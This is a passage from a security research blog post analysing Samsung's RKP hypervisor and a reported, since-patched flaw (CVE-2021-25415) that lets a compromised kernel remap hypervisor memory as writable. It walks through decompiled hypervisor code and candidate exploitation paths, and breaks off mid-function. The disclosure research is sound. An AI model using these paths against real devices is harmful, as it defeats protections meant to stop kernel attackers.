impalabs space base graphics
Attacking Samsung RKP
Disclaimer

This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.

This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After revealing three vulnerabilities leading to the compromise of the hypervisor or of its assurances, we also describe the exploitation paths we came up with. Finally, we take a look at the patches made by Samsung following our report.

In January 2021, we reported three vulnerabilities in Samsung's security hypervisor implementation. Each of the vulnerabilities has a different impact, from writing to hypervisor-enforced read-only memory to compromising the hypervisor itself. The vulnerabilities were fixed in the June 2021 and October 2021 security updates. While they are specific to Samsung RKP, we think that they are good examples of what you should be keeping an eye out for if you're auditing a security hypervisor running on an ARMv8 device.

We will detail each of the vulnerabilities, explain how they can be exploited, and also take a look at their patch. While we recommend reading the original blog post because it will make it easier to understand this one, we tried to summarize all the important bits in the introduction. Feel free to skip the introduction and go directly to the first vulnerability if you are already familiar with Samsung RKP.

Introduction

The main goal of a security hypervisor on a mobile device is to ensure kernel integrity at run time, so that even if an attacker finds a kernel vulnerability, they won't be able to modify sensitive kernel data structures, elevate privileges, or execute malicious code. In order to do that, the hypervisor is executing at a higher privilege level (EL2) than the kernel (EL1), and it can have complete control over it by making use of the virtualization extensions.

Virtualization Extensions

One of the features of the virtualization extensions is a second layer of address translation. When it is disabled, there is only one layer of address translation, which translates a Virtual Address (VA) directly into a Physical Address (PA). But when it is enabled, the first layer (stage 1 - under control of the kernel) now translates a VA into what is called an Intermediate Physical Address (IPA), and the second layer (stage 2 - under control of the hypervisor) translates this IPA into the real PA. This second layer has its own memory attributes, allowing the hypervisor to enforce memory permissions that differ from the ones in the kernel page tables as well as disable access to some physical memory regions.

Another feature of the virtualization extensions, enabled by the use of the Hypervisor Configuration Register (HCR), allows the hypervisor to handle general exceptions and to trap critical operations usually performed by the kernel (such as accessing system registers). Finally, in the cases where the kernel (EL1) needs to call into the hypervisor (EL2), it can do so by executing an HyperVisor Call (HVC) instruction. This is very similar to the SuperVisor Call (SVC) instruction that is used by userland processes (EL0) to call into the kernel (EL1).

Samsung RKP Assurances

Samsung's implementation of a security hypervisor enforces that:

  • the page tables cannot be modified directly by the kernel;
    • accesses to virtual memory system registers at EL1 are trapped;
    • page tables are set as read-only in the stage 2 address translation;
      • except for level 3 tables, but in that case the PXNTable bit is set;
  • double mappings are prevented (but the checking is only done by the kernel);
    • still, we can't make the kernel text read-write or a new region executable;
  • sensitive kernel global variables are moved in the .rodata region (read-only);
  • sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages;
    • on various operations, the credentials of a running task are checked:
      • a task that is not system cannot suddenly become system or root;
      • it is possible to set the cred field of a task_struct in an exploit;
      • but the next operation, like executing a shell, will trigger a violation;
    • credentials are also reference-counted to prevent their reuse by another task;
  • it is not possible to execute a binary as root from outside of specific mount points;
  • on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

Samsung RKP Implementation

Samsung RKP makes extensive use of two data structures: memlists and sparsemaps.

  • A memlist is a list of address ranges (sort of a specialized version of std::vector).
  • A sparsemap associates values with addresses (sort of a specialized version of std::map).

There are multiple instances of these control structures, listed below by order of initialization:

  • the memlist dynamic_regions contains the DRAM regions (sent by S-Boot);
  • the memlist protected_ranges contains critical hypervisor SRAM/DRAM regions;
  • the sparsemap physmap associates a type (kernel text, PT, etc.) to each DRAM page;
  • the sparsemap ro_bitmap indicates if a DRAM page is read-only in the stage 2;
  • the sparsemap dbl_bitmap is used by the kernel to detect double-mapped DRAM pages;
  • the memlist page_allocator.list contains the DRAM region used by RKP's page allocator;
  • the sparsemap page_allocator.map tracks DRAM pages allocated by RKP's page allocator;
  • the memlist executable_regions contains the kernel's executable pages;
  • the memlist dynamic_load_regions is used by the "dynamic load" feature.

Please note that these control structures are used by the hypervisor to keep track of what is in memory and how it is mapped. But they have no direct impact on the actual address translation (unlike the stage 2 page tables). The hypervisor has to carefully keep the control structures and page tables in sync to avoid issues.

The hypervisor has multiple allocators, each serving a different purpose:

  • the "static heap" contains SRAM memory (before initialization) and also DRAM memory (after initialization);
    • It is used for the EL2 page tables, for the memlists and for the page allocator's descriptors;
  • the "dynamic heap" contains only DRAM memory (and the page allocator's memory region is carved out of it);
    • It is used for the EL1 stage 2 page tables and for the sparsemaps (entries and bitmaps);
  • the "page allocator" contains only DRAM memory;
    • It is used for allocating the EL1 stage 1 page tables and for the pages of protected SLUB caches.

Samsung RKP Initialization

The initialization of the hypervisor (alongside the kernel) is detailed in the first blog post. It is crucial when looking for vulnerabilities to know what the state of the various control structures is at a given moment, as well as what the page tables for the stage 2 at EL1 and stage 1 at EL2 contain. The hypervisor state after initialization is reported below.

The control structures are as follows:

  • The protected_ranges contain the hypervisor code/data and the memory backing the physmap.
  • In the physmap,
    • the kernel .text segment is marked as TEXT;
    • user PGDs, PMDs, and PTEs are marked as L1, L2, and L3, respectively;
    • kernel PGDs, PMDs, and PTEs are marked as KERNEL|L1, KERNEL|L2, and KERNEL|L3, respectively.
  • The ro_bitmap contains the kernel .text and .rodata segments, and other pages that have been made read-only in the stage 2 (like the L1, L2, and some of the L3 kernel page tables).
  • The executable_regions contain the kernel .text segment and trampoline page.

In the page tables of the EL2 stage 1 (controlling what the hypervisor can access):

  • the hypervisor segments are mapped (from the initial PTs);
  • the log and "bigdata" regions are mapped as RW;
  • the kernel .text segment is mapped as RO;
  • the first page of swapper_pg_dir is mapped as RW.

In the page tables of the EL1 stage 2 (controlling what the kernel can really access):

  • the hypervisor memory region is unmapped;
  • empty_zero_page is mapped as RWX;
  • the log region is mapped as ROX;
  • the region backing the "dynamic heap" is mapped as ROX;
  • PGDs are mapped as RO:
    • the PXN bit is set on block descriptors;
    • the PXN bit is set on table descriptors, but only for user PGDs.
  • PMDs are mapped as RO:
    • the PXN bit is set for VAs not in the executable_regions.
  • PTEs are mapped as RO for VAs in the executable_regions.
  • the kernel .text segment is mapped as ROX.

Our Research Device

Our test device during this research was a Samsung A51 (SM-A515F). Instead of using a full exploit chain, we have downloaded the kernel source code from Samsung's Open Source website, added a few syscalls, recompiled the kernel, and flashed it onto the device.

The new syscalls make it really convenient to interact with RKP and allow us from userland to:

  • read/write kernel memory;
  • allocate/free kernel memory;
  • make hypervisor calls (using the uh_call function).

Remapping RKP memory as writable from EL1

SVE-2021-20178 (CVE-2021-25415): Possible remapping RKP memory as writable from EL1

Severity: High
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable.
The patch adds the proper address validation in RKP to prevent change of EL2 memory attribution from EL1.

Vulnerability

When Samsung RKP needs to change the permissions of a memory region in the stage 2, it uses either rkp_s2_page_change_permission which operates on a single page, or rkp_s2_range_change_permission which operates on a range of addresses. These functions can be abused to remap hypervisor memory (that was unmapped during initialization) as writable from the kernel, thus fully compromising the security hypervisor. Let's see what happens under the hood when these functions are called.

rkp_s2_page_change_permission starts by performing verifications on its arguments: unless the allow flag is non-zero, the hypervisor must be initialized, the page must not be marked as S2UNMAP in the physmap, it must not come from the hypervisor page allocator, and it cannot be in the kernel .text or .rodata sections. If these verifications succeed, it determines the requested memory attributes and calls map_s2_page to effectively modify the stage 2 page tables. Finally, it flushes the TLBs and updates the writability of the page in the ro_bitmap.

int64_t rkp_s2_page_change_permission(void* p_addr, uint64_t access, uint32_t exec, uint32_t allow) {
  // ...

  // If the allow flag is 0, RKP must be initialized.
  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 574, "s2 page change access not allowed before init %d", allow);
    rkp_policy_violation("s2 page change access not allowed, p_addr : %p", p_addr);
    return -1;
  }
  // The page shouldn't be marked as `S2UNMAP` in the physmap.
  if (is_phys_map_s2unmap(p_addr)) {
    // And trigger a violation.
    rkp_policy_violation("Error page was s2 unmapped before %p", p_addr);
    return -1;
  }
  // The page shouldn't have been allocated by the hypervisor page allocator.
  if (page_allocator_is_allocated(p_addr) == 1) {
    return 0;
  }
  // The page shouldn't be in the kernel text section.
  if (p_addr >= TEXT_PA && p_addr < ETEXT_PA) {
    return 0;
  }
  // The page shouldn't be in the kernel rodata section.
  if (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)) {
    return 0;
  }
  uh_log('L', "rkp_paging.c", 270, "Page access change out of static RO range %lx %lx %lx", p_addr, access, exec);
  // Calculate the memory attributes to apply to the page.
  if (access == 0x80) {
    ++page_ro;
    attrs = UNKN1 | READ;
  } else {
    ++page_free;
    attrs = UNKN1 | WRITE | READ;
  }
  if (p_addr == ZERO_PG_ADDR || exec) {
    attrs |= EXEC;
  }
  // Call `map_s2_page` to make the actual changes to the stage 2 page tables.
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  // Invalidate the TLBs for the target page.
  tlbivaae1is(((p_addr + 0x80000000) | 0xffffffc000000000) >> 12);
  // Call `rkp_set_pgt_bitmap` to update the ro_bitmap.
  return rkp_set_pgt_bitmap(p_addr, access);
}

rkp_s2_range_change_permission operates similarly to rkp_s2_page_change_permission. The first differences are the verifications performed by the function. Here the allow flag can take 3 values: 0 (changes are only allowed after initialization), 1 (only before deferred initialization), and 2 (always allowed). The start and end address must be page aligned and in the expected order. No other verifications are performed. The second difference is the function called to perform the changes to the stage 2 page tables, which is s2_map and not map_s2_page.

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...

  uh_log('L', "rkp_paging.c", 195, "RKP_4acbd6db%lxRKP_00950f15%lx", start_addr, end_addr);
  // If the allow flag is 0, RKP must be initialized.
  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
    rkp_policy_violation("Range change permission prohibited");
  }
  // If the allow flag is 1, RKP must not be deferred initialized.
  else if (allow != 2 && rkp_deferred_inited) {
    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
    rkp_policy_violation("Range change permission prohibited");
  }
  // The start and end addresses must be page-aligned.
  if ((start_addr & 0xfff) != 0 || (end_addr & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 203, "start or end addr is not aligned, %p - %p", start_addr, end_addr);
    return -1;
  }
  // The start address must be smaller than the end address.
  if (start_addr > end_addr) {
    uh_log('L', "rkp_paging.c", 208, "start addr is bigger than end addr %p, %p", start_addr, end_addr);
    return -1;
  }
  // Calculates the memory attributes to apply to the pages.
  size = end_addr - start_addr;
  if (access == 0x80) {
    attrs = UNKN1 | READ;
  } else {
    attrs = UNKN1 | WRITE | READ;
  }
  if (exec) {
    attrs |= EXEC;
  }
  p_addr_start = start_addr;
  // Call `s2_map` to make the actual changes to the stage 2 page tables.
  if (s2_map(start_addr, end_addr - start_addr, attrs, &p_addr_start) < 0) {
    uh_log('L', "rkp_paging.c", 222, "s2_map returned false, p_addr_start : %p, size : %p", p_start_addr, size);
    return -1;
  }
  // For each page, call `rkp_set_pgt_bitmap` to update the ro_bitmap and invalidate the TLBs.
  for (addr = start_addr, addr < end_addr; addr += 0x1000) {
    res = rkp_set_pgt_bitmap(addr, access);
    if (res < 0) {
      uh_log('L', "rkp_paging.c", 229, "set_pgt_bitmap fail, %p", addr);
      return res;
    }
    tlbivaae1is(((addr + 0x80000000) | 0xffffffc000000000) >> 12);
    addr += 0x1000;
  }
  return 0;
}

s2_map is a wrapper around map_s2_page that takes into account the various block and page sizes that make up the memory range. map_s2_page does not use any of the control structures. It won't be detailed in this blog post as it is generic code for walking and updating the stage 2 page tables.

int64_t s2_map(uint64_t orig_addr, uint64_t orig_size, attrs_t attrs, uint64_t* paddr) {
  // ...

  if (!paddr) {
    return -1;
  }
  // Floor the address to the page size.
  addr = orig_addr - (orig_addr & 0xfff);
  // And ceil the size to the page size.
  size = (orig_addr & 0xfff) + orig_size;
  // Call `map_s2_page` for each 2 MB block in the region.
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (map_s2_page(*paddr, addr, 0x200000, attrs)) {
      uh_log('L', "s2.c", 1132, "unable to map 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
    *paddr += 0x200000;
  }
  // Call `map_s2_page` for each 4 KB page in the region.
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (map_s2_page(*paddr, addr, 0x1000, attrs)) {
      uh_log('L', "s2.c", 1150, "unable to map 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
    *paddr += 0x1000;
  }
  return 0;
}

We have seen that the rkp_s2_range_change_permission function performs fewer verifications than rkp_s2_page_change_permission. In particular, it doesn't ensure that the pages of the memory range are not marked as S2UNMAP in the physmap. That means that if we give it a memory range that contains hypervisor memory (unmapped during initialization), it will happily remap it in the second stage.

But it turns out that it is even worse than that: this check doesn't even do anything! One would expect a page to be marked as S2UNMAP in the physmap when it is actually unmapped from stage 2. s2_unmap is the function that does this unmapping. Similarly to s2_map, it is simply a wrapper around unmap_s2_page that takes into account the various block and page sizes that make up the memory range.

int64_t s2_unmap(uint64_t orig_addr, uint64_t orig_size) {
  // ...

  // Floor the address to the page size.
  addr = orig_addr & 0xfffffffffffff000;
  // And ceil the size to the page size.
  size = (orig_addr & 0xfff) + orig_size;
  // Call `unmap_s2_page` for each 1 GB block in the region.
  while (size > 0x3fffffff && (addr & 0x3fffffff) == 0) {
    if (unmap_s2_page(addr, 0x40000000)) {
      uh_log('L', "s2.c", 1175, "unable to unmap 1gb s2 page: %p", addr);
      return -1;
    }
    size -= 0x40000000;
    addr += 0x40000000;
  }
  // Call `unmap_s2_page` for each 2 MB block in the region.
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (unmap_s2_page(addr, 0x200000)) {
      uh_log('L', "s2.c", 1183, "unable to unmap 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
  }
  // Call `unmap_s2_page` for each 4 KB page in the region.
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (unmap_s2_page(addr, 0x1000)) {
      uh_log('L', "s2.c", 1191, "unable to unmap 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
  }
  return 0;
}

It turns out there are no calls to rkp_phys_map_set, rkp_phys_map_set_region, or even the low-level sparsemap_set_value_addr function that ever mark a page as S2UNMAP. Consequently, we can also use rkp_s2_page_change_permission to remap hypervisor memory in the stage 2!

Exploitation

To exploit this two-fold bug, we need to look for calls to the rkp_s2_page_change_permission and rkp_s2_range_change_permission functions that can be triggered from the kernel (after the hypervisor has been initialized) and with controllable arguments.

Exploring Our Options

rkp_s2_page_change_permission is called:

And rkp_s2_range_change_permission is called:

  • in many of the dynamic_load_xxx functions.

Let's go over these functions one by one and see if they fit our requirements.

rkp_lxpgt_process_table

In the first blog post, we took a closer look at the functions rkp_l1pgt_process_table, rkp_l2pgt_process_table and rkp_l3pgt_process_table. It is fairly easy to reach the call to rkp_s2_page_change_permission in these functions, assuming that we control the third argument:

  • if is_alloc is equal to 1, the page must not be marked as LX in the physmap,
    • as a result, it will be set as read-only in the stage 2 and marked as LX.
  • if is_alloc is equal to 0, the page must be marked as LX in the physmap,
    • as a result, it will be set as read-write in the stage 2 and marked as FREE.

So by calling one of these functions twice, the first time with is_alloc set to 1, and the second time with is_alloc set to 0, it will result in a call to rkp_s2_page_change_permission with read-write permissions. The next question is: can we call these functions with controlled arguments?

The function processing the level 1 tables, rkp_l1pgt_process_table, is called:

The first call is in rkp_l1pgt_ttbr, where the function arguments, ttbr and user_or_kernel, are user-controlled. Because we're attacking Samsung RKP after initialization, rkp_deferred_inited and rkp_inited should be true, and the MMU enabled. Then, if pgd is the user PGD empty_zero_page or a kernel PGD other than swapper_pg_dir and tramp_pg_dir, the rkp_l1pgt_process_table function will be called.

int64_t rkp_l1pgt_ttbr(uint64_t ttbr, uint32_t user_or_kernel) {
  // ...

  // Extract the PGD from the TTBR system register value.
  pgd = ttbr & 0xfffffffff000;
  // Don't do any processing if RKP is not deferred initialized.
  if (!rkp_deferred_inited) {
    should_process = 0;
  } else {
    should_process = 1;
    // For kernel PGDs or user PGDs that aren't `empty_zero_page`.
    if (user_or_kernel == 0x1ffffff || pgd != ZERO_PG_ADDR) {
      // Don't do any processing if RKP is not initialized.
      if (!rkp_inited) {
        should_process = 0;
      }
      // Or if it's the `swapper_pg_dir` kernel PGD.
      if (pgd == INIT_MM_PGD) {
        should_process = 0;
      }
      // Or it it's the `tramp_pg_dir` kernel PGD.
      if (pgd == TRAMP_PGD && TRAMP_PGD) {
        should_process = 0;
      }
    }
    // For the `empty_zero_page` user PGD.
    else {
      // Don't do any processing if the MMU is disabled or RKP is not initialized.
      if ((get_sctlr_el1() & 1) != 0 || !rkp_inited) {
        should_process = 0;
      }
    }
  }
  // If processing of the PGD should be done, call `rkp_l1pgt_process_table`.
  if (should_process && rkp_l1pgt_process_table(pgd, user_or_kernel, 1) < 0) {
    return rkp_policy_violation("Process l1t returned false, l1e addr : %lx", pgd);
  }
  // Then set TTBR0_EL1 for user PGDs, or TTBR1_EL1 for kernel PGDs.
  if (!user_or_kernel) {
    return set_ttbr0_el1(ttbr);
  } else {
    return set_ttbr1_el1(ttbr);
  }
}

However, the function will also set the system register TTBR0_EL1 (for user PGDs) or TTBR1_EL1 (for kernel PGDs), and we don't even have control of the is_alloc argument, so this is not a good path. Let's take a look at our other options.

We have seen the rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd functions in the first blog post. They could have been very good candidates, but there is one major drawback to using them: the table address given to rkp_l1pgt_process_table comes from rkp_get_pa. This function calls check_kernel_input to ensure the address is not in the protected_ranges memlist, so we can't use addresses located in hypervisor memory.

Instead, what we can do is try to reach the processing of the next level table so that the value given to rkp_l2pgt_process_table comes from a descriptor's output address and not from a call to rkp_get_pa. This way, the table address argument will be fully user-controlled.

The function processing the level 2 tables, rkp_l2pgt_process_table, is called:

  • in rkp_l1pgt_process_table;
  • in rkp_l1pgt_write (seen in the first blog post).

And the function processing the level 3 tables, rkp_l3pgt_process_table, is called:

  • in check_single_l2e (seen in the first blog post, called from rkp_l2pgt_process_table and rkp_l2pgt_write).

The rkp_l1pgt_write and rkp_l2pgt_write functions, which we have also seen in the first blog post, are very good candidates that allow calling rkp_l2pgt_process_table and rkp_l3pgt_process_table by writing in the kernel page tables a fake level 1 or level 2 descriptor, respectively.

For the sake of completeness, we will take a look at our other options even though we have already found an exploitation path for the vulnerability.

set_range_to_xxx_l3

set_range_to_pxn_l3 is called all the way from rkp_set_range_to_pxn. This function calls rkp_set_range_to_pxn, passing it the PGD as an argument, as well as the start and address of the range to set as PXN in the stage 1 page tables. It also invalidates the TLB and instruction cache.

int64_t rkp_set_range_to_pxn(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  // Call `set_range_to_pxn_l1` to walk the PGD and set PXN bit of the descriptors mapping the address range.
  res = set_range_to_pxn_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 186, "Fail to change attribute to pxn");
    return res;
  }
  // Invalidate the TLBs for the memory region.
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  // Invalidate the instruction cache for the memory region.
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}

set_range_to_pxn_l1 ensures the PGD is marked as KERNEL|L1 in the physmap. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l2 on the table descriptors to process the PMDs.

int64_t set_range_to_pxn_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PGD is marked as `KERNEL|L1` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    res = 0;
    // Iterate over the PGD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc = *(table + 8 * ((next_start_addr >> 30) & 0x1ff));
      // If the descriptor is a table descriptor.
      if ((table_desc & 0b11) == 0b11) {
        // Call `set_range_to_pxn_l2` to walk the PMD and set PXN bit of the descriptors mapping the address range.
        res += set_range_to_pxn_l2(table_desc & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_pxn_l2 ensures the PMD is marked as KERNEL|L2 in the physmap. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l3 on the table descriptors to process the PTs. In addition, if the descriptors don't map one of the executable regions, it sets their PXN bit.

int64_t set_range_to_pxn_l2(uint64_t table, uint64_t start_addr, int64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PMD is marked as `KERNEL|L2` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    res = 0;
    // Iterate over the PMD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      // Check if the descriptor value is in the executable regions. If it is not, set the PXN bit of the descriptor.
      // However, I believe the mask extracting only the output address of the descriptor is missing...
      if (*table_desc_p && !executable_regions_contains(*table_desc_p)) {
        set_pxn_bit_of_desc(table_desc_p, 2);
      }
      // If the descriptor is a table descriptor.
      if ((*table_desc_p & 0b11) == 0b11) {
        // Call `set_range_to_pxn_l3` to walk the PT and set PXN bit of the descriptors mapping the address range.
        res += set_range_to_pxn_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_pxn_l3 checks if the PT is marked as KERNEL|L3 in the physmap. If it is, the hypervisor stops protecting it by making it writable again in the second stage and marking it as FREE in the physmap. If it is not, it then iterates over the descriptors that map the address range given as an argument, and if they don't map one of the executable regions, it sets their PXN bit.

int64_t set_range_to_pxn_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PT is marked as `KERNEL|L3` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l3(table)) {
    // Call `rkp_s2_page_change_permission` to make it writable in the second stage.
    res = rkp_s2_page_change_permission(table, 0 /* read-write */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 153, "pxn l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    // Mark it as `FREE` in the physmap.
    res = rkp_phys_map_set(table, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  // Iterate over the PT descriptors that map the address range.
  for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
    // Compute the start and end address of the region mapped by this descriptor.
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    // If the descriptor is a page descriptor, and the descriptor value is not in the executable regions, then set its
    // PXN bit. I believe the mask extracting only the output address of the descriptor is missing...
    if ((*table_desc_p & 0b11) == 0b11 && !executable_regions_contains(*table_desc_p, 3)) {
      set_pxn_bit_of_desc(table_desc_p, 3);
    }
  }
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_pxn is always called (from the "dynamic load" feature's functions) on swapper_pg_dir. It will thus walk the kernel page tables and set the PXN bit of the block and page descriptors spanning over the specified address range. The call to rkp_s2_page_change_permission that we are interested in only happens for level 3 tables that are also marked KERNEL|L3 in the physmap.

It is not a good option for us for many reasons: our target page of hypervisor memory would need to be marked KERNEL|L3 in the physmap; it requires that we have already written a user-controlled descriptor into the kernel page tables (bringing us back to the rkp_lxpgt_process_table functions that we have seen above); and finally, the "dynamic load" feature is only available on Exynos devices, as we are going to see with the next vulnerability.

set_range_to_rox_l3 is called all the way from rkp_set_range_to_rox. The rkp_set_range_to_rox and set_range_to_rox_lx functions are very similar to their PXN counterparts. rkp_set_range_to_rox calls set_range_to_rox_l1, passing it the PGD as an argument.

int64_t rkp_set_range_to_rox(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  // Call `set_range_to_pxn_l1` to walk the PGD and set the regions of the address range as ROX.
  res = set_range_to_rox_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 199, "Fail to change attribute to rox");
    return res;
  }
  // Invalidate the TLBs for the memory region.
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  // Invalidate the instruction cache for the memory region.
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}

set_range_to_rox_l1 ensures the PGD is not swapper_pg_dir and is marked as KERNEL|L1 in the physmap. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l2 to process the PMDs.

int64_t set_range_to_rox_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  if (table != INIT_MM_PGD) {
    rkp_policy_violation("rox only allowed on kerenl PGD! l1t : %lx", table);
    return -1;
  }
  rkp_phys_map_lock(table);
  // Ensure the PGD is marked as `KERNEL|L1` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    res = 0;
    // Iterate over the PGD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 30) & 0x1ff);
      // Set the AP bits to RO and unset the PXN bit of the descriptor.
      if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 1);
      }
      // If the descriptor is a table descriptor.
      if ((*table_desc_p & 0b11) == 0b11) {
        // Call `set_range_to_rox_l2` to walk the PMD and set the regions of the address range as ROX.
        res += set_range_to_rox_l2(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_rox_l2 ensures the PMD is marked as KERNEL|L2 in the physmap. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l3 to process the PTs.

int64_t set_range_to_rox_l2(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PMD is marked as `KERNEL|L2` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    // Iterate over the PMD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      // Set the AP bits to RO and unset the PXN bit of the descriptor.
      if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 2);
      }
      // If the descriptor is a table descriptor.
      if ((*table_desc_p & 0b11) == 0b11) {
        res += set_range_to_rox_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_rox_l3 checks if the PT is marked as KERNEL|L3 in the physmap. If it is not, the hypervisor starts protecting it by making it read-only in the second stage and marking it as KERNEL|L3 in the physmap. If it is, it then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only and executable.

int64_t set_range_to_rox_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PT is NOT marked as `KERNEL|L3` in the physmap.
  if (!is_phys_map_kernel(table) || !is_phys_map_l3(table)) {
    // Call `rkp_s2_page_change_permission` to make it writable in the second stage.
    res = rkp_s2_page_change_permission(table, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 193, "rox l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    // Mark it as `KERNEL|L3` in the physmap.
    res = rkp_phys_map_set(table, FLAG2 | KERNEL | L3);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  // Iterate over the PT descriptors that map the address range.
  for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
    // Compute the start and end address of the region mapped by this descriptor.
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    // If the descriptor is a page descriptor, set its AP bits to RO and unset its PXN bit.
